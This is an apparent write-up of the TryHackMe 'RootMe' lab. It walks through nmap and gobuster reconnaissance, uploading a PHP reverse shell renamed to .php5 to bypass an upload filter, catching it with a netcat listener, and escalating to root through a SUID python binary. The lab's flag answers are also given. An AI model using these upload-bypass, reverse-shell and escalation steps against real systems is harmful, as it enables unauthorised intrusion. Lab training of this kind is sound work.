RootMe -TryHackMe Challenge Walkthrough
Site Link: https://tryhackme.com/r/room/rrootme
Task 1 Deploy the machine
Connect to TryHackMe network and deploy the machine. If you don’t know how to do this, complete the OpenVPN room first.
Answer the questions below
Deploy the machine
Task 2 Reconnaissance
First, let’s get information about the target.
- Open web browser and navigate to the Target IP Address
http://<TARGET MACHINE_IP>
2. inspect View source
Ctrl + UNothing was found
2. Scan the target using Nmap to gather useful information about its services.
nmap -sV -T4 <TARGET MACHINE_IP>-sV: Detects service versions, meaning it tries to find out what versions of software are running on the open ports.
-T4: Sets the timing template to 4, which speeds up the scan
Open Ports:
Port 22/tcp (SSH): Open, running OpenSSH 7.6p1 on Ubuntu 4ubuntu0.3 (Ubuntu Linux).
Port 80/tcp (HTTP): Open, running Apache httpd 2.4.29 on Ubuntu.
Closed Port:
998 TCP ports are closed (connection refused).
Operating System: Linux
Answer the questions below
2.1 Scan the machine, how many ports are open?
Answer: 2
2.2 What version of Apache is running?
Answer: 2.4.29
2.3 What service is running on port 22?
Answer: ssh
2. Finding directories on the web server using the GoBuster tool
GoBuster helps find hidden files and directories on a server. It checks for places that aren’t normally visible to users, helping to spot potential security issues or misconfigurations. This is useful for security tests to see what might be exposed.
gobuster dir -u http:// <TARGET MACHINE_IP> -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txtgobuster dir: Runs GoBuster in directory/file brute-forcing mode.
-u http://<TARGET MACHINE_IP>: Specifies the target IP address or URL where you want to find hidden directories.
- w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt: Points to the wordlist that GoBuster will use.
The GoBuster scan results show directories like /uploads/, /css/, and /js/ are normal and found on many websites. They usually contain files like stylesheets, JavaScript, or user-uploaded content that everyone can see.
/panel/ directory stands out as it could be an important administrative area to explore further. If it’s not properly secured, it may provide access to critical functions.
Answer the questions below
2.5 What is the hidden directory?
ANSWER: /panel/
3. Next Steps:
Investigating: http:// <TARGET MACHINE_IP>/panel/ directory
To explore this directory, open a web browser and enter the URL in the browser
http://<TARGET MACHINE_IP>/panel
Task 3 Getting a shell
Find a form to upload and get a reverse shell, and find the flag.
Answer the questions below
user.txt (Question Hint Search for “file upload bypass” and “PHP reverse shell”.)
- Clone the php-reverse-shell repository from GitHub (PentestMonkey’s PHP Reverse Shell)
git clone https://github.com/pentestmonkey/php-reverse-shell2. List the content
ls3. Navigate into the directory
cd php-reverse-shell4. List the content
ls5. Open the php-reverse-shell.php file using tex editor
nano php-reverse-shell.phpLook for the following section in the script, where you will modify the $ip and $port variables:
// CHANGE THIS
$ip = 'YOUR_IP'; // Your IP address for the reverse shell connection
$port = YOUR_PORT; // The port number you will use for the listenerSave and exit:
CTRL + o to save after Enter and CTRL + X to exit
6. Select the php-reverse-shell.php file and click Upload.
The Uplode result shows an error message, that means the PHP file is not allowed. This indicates that the upload system is blocking the upload of PHP files for security reasons.
7.Search for “file upload bypass” and “PHP reverse shell”.
https://sushant747.gitbooks.io/total-oscp-guide/content/bypass_image_upload.html
We can Rrnaming the php-reverse-shell.php file to something less suspicious so we can bypass file upload and list the content
cp php-reverse-shell.php php-reverse-shell.php5
ls
The file has been successfully uploaded
8. Set up a listener on your local machine using Netcat
nc -lvnp <LISTENING_PORT>9. Navgate to uploaded file’s URL to executes the PHP code on the server.
Now we need to go to ip_addr/uploads/ and Click on shell.php5
http://<TARGET MACHINE_IP>/uploadsClick on shell.php5
We have reverse a limited shell
Upgrade the shell
python -c 'import pty; pty.spawn("/bin/bash")'Use fine to locate user.txt
find / -type f -name user.txt 2>/dev/nullThe user.txt file at /var/www/user.txt
Now we can display the content
cat /var/www/user.txt
we found the flag
3.1 Answer: THM{y0u_g0t_a_sh3ll}
Task 4 Privilege escalation
Now that we have a shell, let’s escalate our privileges to root.
Answer the questions below
4.1 Search for files with SUID permission, which file is weird?
Find a form to escalate your privileges.
root.txt
- Starting with finding files with SUID Permissions Owned by Root
find / -type f -user root -perm -4000 2>/dev/null
Answer the questions below
4.1 Search for files with SUID permission, which file is weird?
Answer: usr/bin/python
2. Since we already found SUID binaries will use GTFOBins to see if any of these binaries can be exploited for privilege escalation
https://gtfobins.github.io/
Search for python
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
The privilege escalation was successful we have a root shell
3. List the content and navigate to the root directory , list the consent inside , and concatenate root.txt
The last flag
4.3 Answer: THM{pr1v1l3g3_3sc4l4t10n}
